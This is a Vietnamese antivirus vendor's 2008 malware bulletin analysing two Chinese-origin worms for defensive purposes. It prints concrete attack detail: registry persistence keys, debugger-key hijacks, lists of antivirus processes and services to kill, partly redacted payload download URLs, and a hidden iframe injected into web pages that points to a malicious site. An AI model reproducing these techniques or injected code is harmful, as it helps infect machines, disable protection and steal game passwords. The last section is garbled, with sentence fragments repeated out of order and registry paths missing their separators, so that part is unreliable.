Bkav2022 (27/11/2008) cập nhật lần thứ 1: VomoG, DashferFG Malware cập nhật mới nhất:  Tên malware: W32.FialaAAB.Worm  Thuộc họ: W32.Fiala.Worm  Loại: Worm  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 26/11/2008  Kích thước: 15Kb  Mức độ phá hoại: Cao Nguy cơ:  Làm giảm mức độ an ninh của hệ thống.  Bị ăn cắp mật khẩu tài khoản Game Online.  Bị Hacker chiếm quyền điều khiển từ xa. Hiện tượng:  Sửa registry.  Không sử dụng được một số chương trình Antivirus, một vài tiện ích của Windows và một vài chương trình khác.  Không hiện được các file có thuộc tính ẩn.  Hiện các popup quảng cáo gây khó chịu.  Vào Yahoo Messenger một lúc thì bị thông báo Send/Don't Send và không sử dụng được.  Có thể bị sập toàn bộ mạng LAN (không truy cập vào Internet được). Cách thức lây nhiễm:  Phát tán qua trang web.  Tự động lây nhiễm vào USB.  Giả mạo Gateway để phát tán link độc có chứa virus. Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại  Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật:  Copy bản thân thành file có tên "wuauc1t.exe" và "Explorer.exe" vào thư mục %SysDir%  Copy bản thân thành file có tên "MSDN.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.  Ghi giá trị "IEXPLORER" vào key HKLM\ \Run, sửa giá trị "Shell" trong key HKLM\ \Winlogon để virus được kích hoạt mỗi khi windows khởi động.  Ghi key debugger để chạy file của virus thay vì chạy các file : 360rpt.EXE, 360safe.EXE, 360tray.EXE, AVP.EXE, AvMonitor.EXE, CCenter.EXE, IceSword.EXE, Iparmor.EXE, KVMonxp.kxp, KVSrvXP.EXE, KVWSC.EXE, Navapsvc.EXE, Nod32kui.EXE, KRegEx.EXE, Frameworkservice.EXE, Mmsk.EXE, Wuauclt.EXE, Ast.EXE, WOPTILITIES.EXE, Regedit.EXE, AutoRunKiller.EXE, VPC32.EXE, VPTRAY.EXE, ANTIARP.EXE, KASARP.EXE, ~.EXE, RAS.EXE, Runiep.EXE, GuardField.EXE, GFUpd.EXE  Tắt các process : VsTskMgr.exe, Runiep.exe, RAS.exe, UpdaterUI.exe, TBMon.exe, KASARP.exe, scan32.exe, VPC32.exe, VPTRAY.exe, ANTIARP.exe, KRegEx.exe, KvXP.kxp, kvsrvxp.kxp, kvsrvxp.exe, KVWSC.EXE, Iparmor.exe, 360rpt.EXE, CCenter.EXE, RAVMON.EXE, RAVMOND.EXE, GuardField.exe, Ravxp.exe, GFUpd.exe  Dừng các service : McShield, KWhatchsvc, KPfwSvc, Symantec AntiVirus, Symantec AntiVirus Definition Watcher McAfee Framework, Norton AntiVirus Server  Xóa key không cho người dùng khởi động vào chế độ Safe mode  Ghi key không cho người dùng hiển thị các file có thuộc tính ẩn và hệ thống.  Tự động update bản thân từ link : http://xni[removed]i.com/mm.exe  Download malware từ các link : http://xni[removed]i.com/1.exe http://xni[removed]i.com/10.exe  Các malware này bao gồm: o Trojan giả mạo gateway để phát tán virus qua link độc (http://w.xnibi.co[removed]/index.gif, ) o Downloader (tải về rất nhiều malware khác) o Keylogger (ăn cắp mật khẩu Games Online) o Adware (popup các trang web quảng cáo, sửa StartPage của IE), Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.CryptAgnt.Rootkit, W32.VomoG.PE, W32.KavoDLAMA.Worm, W32.OlGZJA.Trojan, W32.DashferFG.PE, W32.Afinding.Adware, W32.Wserving.Adware, W32.AmvoSJ.Worm, W32.FakeAntiSL.Trojan, W32.SecretIJS.Worm, W32.TavoSK.Worm, W32.WinKS.Worm Bkav2024 (28/11/2008) cập nhật lần thứ 2: WhBoyAO, FialaDMD Malware cập nhật mới nhất:  Tên malware: W32.WhBoyAO.PE  Thuộc họ: W32.WhBoy.PE  Loại: PE  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 27/11/2008  Kích thước: 943Kb  Mức độ phá hoại: Cao Nguy cơ:  Phá hủy chương trình, dữ liệu.  Làm giảm mức độ an ninh của hệ thống. Hiện tượng:  Sửa registry.  Làm mờ icon một số file exe  Ngăn cản người sử chạy các chương trình diệt virus.  Ghi file Desktop_.ini vào tất cả các thư mục  Không xem được file ẩn  Làm tốc độ máy chậm đi rõ rệt Cách thức lây nhiễm:  Tự động lây nhiễm vào USB.  Phát tán qua các tài nguyên chia sẻ mạng nội bộ.  Phát tán qua trang web: các trang web. Cách phòng tránh:  Không nên mở các ổ USB mới chưa được quét virus bằng cách nháy kép vào ổ đĩa.  Không nên share full các ổ đĩa, thư mục trong mạng nội bộ, nên đặt password truy cập nếu muốn chia sẻ quyền sửa và tạo file.  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Mô tả kỹ thuật:  Ghi giá trị “svcshare”=”%WINDIR%\system32\drivers\spoclsv.exe” Vào key HKCU\Software\Microsoft\Windows\CurrentVersion\Run để virus được kích hoạt mỗi khi Windows khởi động  Ghi giá trị “CheckedValue”=”0” Vào key HKLM\ \Explorer\Advanced\Folder\Hidden\SHOWALL để không hiện file ẩn nhằm che dấu virus.  Copy nó thành file "spoclsv.exe" vào thư mục %WinDir%\system32\drivers\  Copy bản thân thành các file có tên "Setup.exe" vào tất cả các ổ đĩa USB, ổ đĩa mềm và ghi vào các ổ đĩa đó file "autorun.inf" để virus phát tán qua các ổ đĩa này  Copy bản thân nó thành "GameSetup.exe" vào tất cả các thư mục share trong mạng nội bộ để virus phát tán qua mạng LAN  Tìm và xóa các file có phần mở rộng là "gho" (các file ghost)  Tìm và lây vào các file có phần mở rộng là "htm", "html", "asp", "aspx", "jsp", "asp", "php" đoạn mã sau để liên kết tới trang web chứa virus <iframe src=http://www.krv[Removed]r.com/worm.htm width="0" height="0"></iframe>  Tìm và lây toàn bộ thân virus vào các file có phần mở rộng là "exe", "scr", "pif", "com"  Dừng các dịch vụ của các chương trình diệt virus và firewall: o Schedule o sharedaccess o RsCCenter o RsRavMon o KVWSC o KVSrvXP o kavsvc o AVP o McAfeeFramework o McShield o navapsvc o wscsvc o KPfwSvc o SNDSrvc o ccProxy o ccEvtMgr o ccSetMgr o SPBBCSvc o Symantec Core LC o NPFMntor o MskService o FireSvc  Xóa các key để ngăn các chường trình diệt virus chạy lúc khởi động trong HKLM\Software\Microsoft\Windows\CurrentVersion\Run: o RavTask o KvMonXP o kav o KAVPersonal50 o McAfeeUpdaterUI o Network Associates Error Reporting Service o ShStatEXE o YLive.exe . các service : McShield, KWhatchsvc, KPfwSvc, Symantec AntiVirus, Symantec AntiVirus Definition Watcher McAfee Framework, Norton AntiVirus Server  Xóa key không cho người dùng khởi động vào. trị "Shell" trong key HKLM Winlogon để virus được kích hoạt mỗi khi windows khởi động.  Ghi key debugger để chạy file của virus thay vì chạy các file : 360rpt.EXE, 360safe.EXE,. HKCUSoftwareMicrosoftWindowsCurrentVersionRun để virus được kích hoạt mỗi khi Windows khởi động  Ghi giá trị “CheckedValue”=”0” Vào key HKLM ExplorerAdvancedFolderHiddenSHOWALL để không hiện file ẩn nhằm che dấu virus. 